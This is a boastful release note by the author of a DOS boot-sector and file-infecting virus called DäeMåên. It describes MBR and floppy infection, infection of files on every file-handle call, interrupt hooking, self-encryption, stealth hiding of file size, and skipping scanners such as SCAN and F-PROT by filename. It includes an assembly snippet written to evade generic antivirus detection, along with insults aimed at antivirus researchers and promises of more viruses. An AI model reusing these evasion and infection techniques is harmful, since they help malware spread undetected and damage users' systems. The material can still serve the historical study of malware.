DäeMåên Virus │ ~~~~~~~~~~~~~ │ │ This virus took me a while to write (about two weeks), because I was │ writing a lot of it for the first time. Some of the code is a bit │ overboard, like I don't think the SYS entry has to be quite that complex │ in order to work... but never mind. At least it works and it's quite │ well-behaved. │ │ This virus is my first boot/file virus, and that also works perfectly. │ I worked all my own routines from scratch (my virus collection is │ extremely small, and I don't want to be influenced by other │ implementations unless they're better). │ │ It infects both floppy boot sectors, moving the original boot sector to │ the 5th last sector of the disk and writing the virus code on the last │ four. It also infects the Master Boot Record (partition table) on the │ first physical hard disk. Booting off an infected floppy will infect │ the MBR, as will the execution of an infected file. However, trying to │ read the partition table results in the redirection of the call, │ resulting in the original partition table (prior to infection) being │ read/written. │ │ Floppies are infected on read/write access, and won't be infected if the │ drive is still spinning (ie. no disk change). It will take the boot │ sector and use the BPB to calculate the last sectors of the disk, no │ matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk. │ It makes sure it's a valid BPB by checking the OEM name to see if it's │ valid alphanumeric characters, but I was a bit selfish in that I overwrite │ the last word of OEM to mark infection. │ │ Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be │ infected on every possible file handle access I could find, ie. they │ will be infected on Open (3D), Close (3E), Attrib Change (43), Execution │ (4B), Handle Rename/Move (56), and Extended Open (6C). It manages to │ infect on file close by recording the filename by intercepting Create │ (3C) call, and the handle if it was created successfully. │ │ If resident off infected file, it will not hook int 13h directly, │ instead searching segment 70h for DOS's call to the original interrupt │ handler, then putting our address in there instead and using the old │ address for our calls. It would have been possible to search the ROM │ BIOS for the correct handler, but that would circumvent future │ generations of boot/file viruses. │ │ DäeMåên employs a small decryption algorythm, however it is not variable │ mutation, since a few registers have to be saved in order for the SYS │ infection to work. The code is thoroughly encrypted, and McAfee and │ friends will have to write a new disinfection engine for this baby. │ However, disk infections are not encrypted, although it would have been │ easily done. │ │ The routine to load the virus off the disk has been altered to avoid │ detection as Generic Boot Sector/Generic Partition virus. The changes │ are trivial, and it makes it look as if I don't know what I'm doing. │ The fact that I'm avoiding detection isn't readily apparent. Here is │ a code comparison, take a look for yourself. │ │ Generic DäeMåên │ mov si, 413h mov si, 412h │ sub word ptr [si], 3 add word ptr [si+1], -3 ; take 3k │ int 12h lodsb │ lodsw │ mov cl, 6 mov cl, 6 │ shl ax, cl shl ax, cl │ mov es, ax mov es, ax │ xor bx, bx xor bx, bx │ │ The one on the left will be detected by SCAN, the one on the right will │ not. The differences are trivial. SCAN is such a stupid program, it's │ just ridiculous that millions of PC users rely on it utterly for total │ virus protection. That's great... │ │ DäeMåên is partially selective in which files it infects. Firstly, it │ will scan the filename for the characters SC, VS, CL and F-, which │ excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and │ F-PROT. │ │ Nor will it infect programs which have internal overlays. This is a │ great advantage since people running WinDoze won't have their favourite │ XYZ program fuck up because a virus infected it. DäeMåên simply will │ not infect programs with internal overlays. Here is the code to detect │ them: │ │ chkovl: call file_end │ push ax ; check for internal overlays │ push dx │ mov ax, word ptr [page_cnt] │ mov cx, 512 │ mul cx │ pop cx │ pop bp │ cmp ax, bp │ jb done │ cmp dx, cx │ jb done │ [...] │ done: ret │ │ Pretty simple routine, huh? │ │ The beauty of this beast is that one small mistake, like trying to boot │ an infected disk by accident, or perhaps running an infected file, is │ that next time you boot up your system, EVERY file in your CONFIG.SYS, │ AUTOEXEC.BAT and everything henceforth will become infected! It is very │ easy to expose a large number of files to the virus in a very short │ space of time. Again, SCAN will probably help the spread of this virus │ immensely, by stupid users scanning their HD habitually, with the virus │ in memory... of course, EVERY file will then be infected. │ │ As if that weren't enough for one virus, DäeMåên will also hide the │ increase of file size on the DOS directory. However, like most other │ viruses which employ this stealth method, CHKDSK will not report any │ allocation errors on these files. File size increase will be only 2048 │ bytes, or 4096 bytes for SYS files. It will account for the different │ increase of the SYS. │ │ To hide the increase, DäeMåên employs a little-exploited method, which │ is by adding 100 years to the date of the file. This way, other │ over-exploited methods (like setting the seconds field to a certain │ value) will not interfere with DäeMåên's stealth operation, and │ vice-versa. │ │ DäeMåên also includes a number of text strings: │ │ "[DäeMåên] by TäLöN-{NûKΣ}" 25 bytes │ "Hugs to Sara Gordon" 19 bytes │ "Hey John! If this is bad, wait for [VCL20]!" 43 bytes │ "For Dudley" 11 bytes │ "[VCL20ß]/TäLöN" 15 bytes │ total 113 bytes │ │ (That stuff about VCL20ß is ßogus, just to make McAsshole shit his │ pants. But AV researchers be warned: a fair few of the routines │ contained in DäeMåên will also appear in VCL 2.0, like the boot/file │ infect capability!) │ │ Virus Length = 2048 │ Message Length = 113 │ ...Code Length = 1935 bytes!!! │ │ Totally unheard of! │ │ I seriously doubt anybody can beat that, at least not for a while yet. │ │ For a quick rehash of what this virus does... │ │ COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a │ mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck │ up her description of this virus, she is so pathetically brain-dead. │ │ Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR │ INFECTOR coming soon to a computer installation near you! From TäLöN of │ course! And another one minus the polymorphism, under 800 bytes! │ │ Have fun! And good night, John! │ │ TäLöN/NuKE │